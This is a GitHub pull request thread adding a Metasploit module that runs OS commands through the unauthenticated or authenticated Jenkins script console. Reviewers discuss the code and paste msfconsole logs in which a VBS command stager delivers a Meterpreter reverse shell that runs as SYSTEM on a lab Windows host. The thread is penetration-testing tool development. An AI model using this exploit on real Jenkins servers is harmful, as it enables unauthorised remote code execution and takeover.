add module to execute commands via Jenkins Script Console #1338
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'jamcut' | ||
| ], | ||
| 'License' => MSF_LICENSE, | ||
| 'Version' => '$Revision: $', |
There was a problem hiding this comment.
The Version field isn't needed anymore (svn related)
|
The exploit doesn't work for me when using an empty username and password. I think the exploit should allow it, because the windows package, by default hasn't enabled security, so no username and password by default to access the script console: msf exploit(jenkins_script_console) > show options Module options (exploit/multi/http/jenkins_script_console): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username PATH / yes The path to jenkins Proxies no Use a proxy chain RHOST 192.168.1.147 yes The target address RPORT 8080 yes The target port USERNAME no The username to authenticate as VHOST no HTTP server virtual host Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 192.168.1.128 yes The listen address LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Windows msf exploit(jenkins_script_console) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Checking access to the script console [-] Exploit failed: NoMethodError undefined method `split' for nil:NilClass |
|
|
||
| when 'unix' | ||
| print_status("#{rhost}:#{rport} - Sending payload...") | ||
| http_send_command("#{payload.encoded}") |
There was a problem hiding this comment.
In the "struts_code_exec.rb" there is a nice linux stager wrote by bannedit I guess, not sure if you tried if it could work in this case.
|
The issue was the JSESSIONID= was not matching the cookie when installing Jenkins from the original site (as opposed to bitnami), which included additional information like JSESSIONID.24e25ab7. The module will still detect, and handle if logging in is required and seems to be working as would be expected in either case. Thanks for the help testing jvazquez. |
|
Tested working better now in windows: msf > use exploit/multi/http/jenkins_script_console msf exploit(jenkins_script_console) > set rhost 192.168.1.147 rhost => 192.168.1.147 msf exploit(jenkins_script_console) > set rport 8080 rport => 8080 msf exploit(jenkins_script_console) > show options Module options (exploit/multi/http/jenkins_script_console): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username Proxies no Use a proxy chain RHOST 192.168.1.147 yes The target address RPORT 8080 yes The target port TARGETURI /jenkins/ yes The path to jenkins USERNAME no The username to authenticate as VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Windows msf exploit(jenkins_script_console) > set TARGETURI / TARGETURI => / msf exploit(jenkins_script_console) > rexploit [*] Reloading module... [*] Started reverse handler on 192.168.1.128:4444 [*] Checking access to the script console [*] No authentication required, skipping login... [*] 192.168.1.147:8080 - Sending VBS stager... [*] Command Stager progress - 2.01% done (2048/101881 bytes) [*] Command Stager progress - 4.02% done (4096/101881 bytes) [*] Command Stager progress - 6.03% done (6144/101881 bytes) [*] Command Stager progress - 8.04% done (8192/101881 bytes) [*] Command Stager progress - 10.05% done (10240/101881 bytes) [*] Command Stager progress - 12.06% done (12288/101881 bytes) [*] Command Stager progress - 14.07% done (14336/101881 bytes) [*] Command Stager progress - 16.08% done (16384/101881 bytes) [*] Command Stager progress - 18.09% done (18432/101881 bytes) [*] Command Stager progress - 20.10% done (20480/101881 bytes) [*] Command Stager progress - 22.11% done (22528/101881 bytes) [*] Command Stager progress - 24.12% done (24576/101881 bytes) [*] Command Stager progress - 26.13% done (26624/101881 bytes) [*] Command Stager progress - 28.14% done (28672/101881 bytes) [*] Command Stager progress - 30.15% done (30720/101881 bytes) [*] Command Stager progress - 32.16% done (32768/101881 bytes) [*] Command Stager progress - 34.17% done (34816/101881 bytes) [*] Command Stager progress - 36.18% done (36864/101881 bytes) [*] Command Stager progress - 38.19% done (38912/101881 bytes) [*] Command Stager progress - 40.20% done (40960/101881 bytes) [*] Command Stager progress - 42.21% done (43008/101881 bytes) [*] Command Stager progress - 44.22% done (45056/101881 bytes) [*] Command Stager progress - 46.23% done (47104/101881 bytes) [*] Command Stager progress - 48.24% done (49152/101881 bytes) [*] Command Stager progress - 50.25% done (51200/101881 bytes) [*] Command Stager progress - 52.26% done (53248/101881 bytes) [*] Command Stager progress - 54.28% done (55296/101881 bytes) [*] Command Stager progress - 56.29% done (57344/101881 bytes) [*] Command Stager progress - 58.30% done (59392/101881 bytes) [*] Command Stager progress - 60.31% done (61440/101881 bytes) [*] Command Stager progress - 62.32% done (63488/101881 bytes) [*] Command Stager progress - 64.33% done (65536/101881 bytes) [*] Command Stager progress - 66.34% done (67584/101881 bytes) [*] Command Stager progress - 68.35% done (69632/101881 bytes) [*] Command Stager progress - 70.36% done (71680/101881 bytes) [*] Command Stager progress - 72.37% done (73728/101881 bytes) [*] Command Stager progress - 74.38% done (75776/101881 bytes) [*] Command Stager progress - 76.39% done (77824/101881 bytes) [*] Command Stager progress - 78.40% done (79872/101881 bytes) [*] Command Stager progress - 80.41% done (81920/101881 bytes) [*] Command Stager progress - 82.42% done (83968/101881 bytes) [*] Command Stager progress - 84.43% done (86016/101881 bytes) [*] Command Stager progress - 86.44% done (88064/101881 bytes) [*] Command Stager progress - 88.45% done (90112/101881 bytes) [*] Command Stager progress - 90.46% done (92160/101881 bytes) [*] Command Stager progress - 92.47% done (94208/101881 bytes) [*] Command Stager progress - 94.48% done (96256/101881 bytes) [*] Command Stager progress - 96.49% done (98304/101881 bytes) [*] Command Stager progress - 98.50% done (100348/101881 bytes) [*] Command Stager progress - 100.00% done (101881/101881 bytes) [*] Sending stage (752128 bytes) to 192.168.1.147 [*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.147:1938) at 2013-01-20 02:39:09 +0100 meterpreter > getuid sServer username: NT AUTHORITY\SYSTEM meterpreter > sysinfo Computer : JUAN-C0DE875735 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 meterpreter > exit [*] Shutting down Meterpreter... [*] 192.168.1.147 - Meterpreter session 1 closed. Reason: User exit msf exploit(jenkins_script_console) > Since there isn't response about the linux stager comment I'll do a little testing tomorrow around it :) Hopefully we'll be able to close it soon ! :D Thanks @zeroSteiner !! |
|
Hi @zeroSteiner, I've added a new target for linux staging so native meterpreter can be executed. The Unix CMD target remains because it's always useful. CMD payloads are fine and the staging can fail in some targets! If you agree with the code, please land this pull request into your branch ( zeroSteiner#1 ), and this pull request will be automatically updated!
|
Added target for linux stager
I like it. Before spoke to #metasploit on IRC I was hoping to add this in with the features of #1275 but since mixins can't be used based on the platform this will work. |
|
Awesome! :) merging! |
5 tasks
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This pull requests introduces a module to execute OS commands via the Groovy script console of Jenkins continuous integration server. It's been tested on Windows as well as Ubuntu on versions 1.496 and 1.499 (latest).
Jenkins can be found here: http://jenkins-ci.org/
Ubuntu output
Windows output